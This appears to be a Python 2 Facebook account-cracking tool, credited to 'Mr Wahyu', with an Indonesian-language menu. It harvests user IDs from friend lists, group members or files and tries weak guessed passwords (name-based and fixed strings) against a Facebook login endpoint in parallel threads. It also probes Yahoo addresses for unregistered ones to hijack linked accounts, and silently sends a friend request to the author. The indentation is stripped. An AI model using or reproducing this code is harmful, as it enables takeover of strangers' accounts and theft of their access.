\033[1;93m█\033[1;92m▼▼▼▼▼ \033[1;92m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;93m█ \033[1;92m \033[1;92m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;93m█\033[1;92m▲▲▲▲▲\033[1;92m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96 +v1.5+
\033[1;93m█████████ \033[1;92m«----------✧----------»
\033[1;93m ██ ██
\033[1;93m╔════════════════════════════════════════════╗
\033[1;93m║\033[1;96m* \033[1;93mAuthor \033[1;93m : \033[1;93mBrother•|Mr Wahyu|➳TNཽ ཽ ྀ ྭ ྱ ྲ ཻƊ❍ηαLཽɗ︵✿ 033[1;93m ║
\033[1;93m║\033[1;96m* \033[1;93mYouTube \033[1;93m : \033[1;93m\033[:Mr Wahyu Gans Yt \033[0m \033[1;93m║
\033[1;93m║\033[1;96m* \033[1;93m*WhatsApp \033[1;93m:
\033[1;93m083178913074[1;93m
\033[1;93m*Support:➳TNཽ ཽ ྀ ྭ ྱ ྲ ཻƊ❍ηαLཽɗ︵✿
\033[1;93mKENA CP MAMPUS MAKANYA BUAT AKUN DI OPERA MINI
║
\033[1;93m╚════════════════════════════════════════════╝"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk by Wahyu \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;96m [¤] \x1b[1;93mASSALAMUALAIKUM\x1b[1;96m \033[1;96m [¤] \x1b[1;93mWHATSAPP : 083178913074\x1b[1;96m
\033[1;96m [¤] \x1b[1;93mSELAMAT DATANG\x1b[1;96m [¤] \x1b[1;93mLOGIN SC: UNTUK LOGIN +USERNAME+:Gua +PASSWORD+:Nyari Pacar \x1b[1;96m
\033[1;96m [¤] \x1b[1;93mYang Cewe Chat Gua:(\x1b[1;96m [¤] \x1b[1;93mYOUTUBE : MrWahyu Gans\x1b[1;96m"""
print " \x1b[1;93m============================================================="
CorrectUsername = "Gua"
CorrectPassword = "Nyari Pacar"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUSERNAME TOOLS INI \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPASSWORD TOOLS INI \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "yang bener dong"
os.system('xdg-open https://www.youtube.com/channel/UCDDhEG8tBuHTpdYP00vGDZg')
else:
print "salah sayang!"
os.system('xdg-open https://www.youtube.com/channel/UCDDhEG8tBuHTpdYP00vGDZg')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FB ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
os.system('xdg-open https://www.youtube.com/channel/UCJRsXsoiWHqBysdGXEjl8Hg')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mSepertinya akun anda kena checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Hack Fb Cepat"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Lihat daftar grub "
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Hack penipu "
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Keluar "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
yahoo()
elif unikers =="0":
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack dari teman"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack dari member grup"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Crack dari file"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Kontol'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken tidak ditemukan"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;96m[\033[1;92mGroup\033[1;96m]\x1b[1;97m "+str(id)+" \x1b[1;96m=>\x1b[1;97m "+str(nama)
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Clone dari teman"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Clone dari member group"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Clone dari file"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULN✓\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/TemanMailVuln.txt','w')
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULN✓\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;97mVULN✓\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;96m[\033[1;92mVULN✓\033[1;96m] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | mrwahyu-556.noreply@github.com |
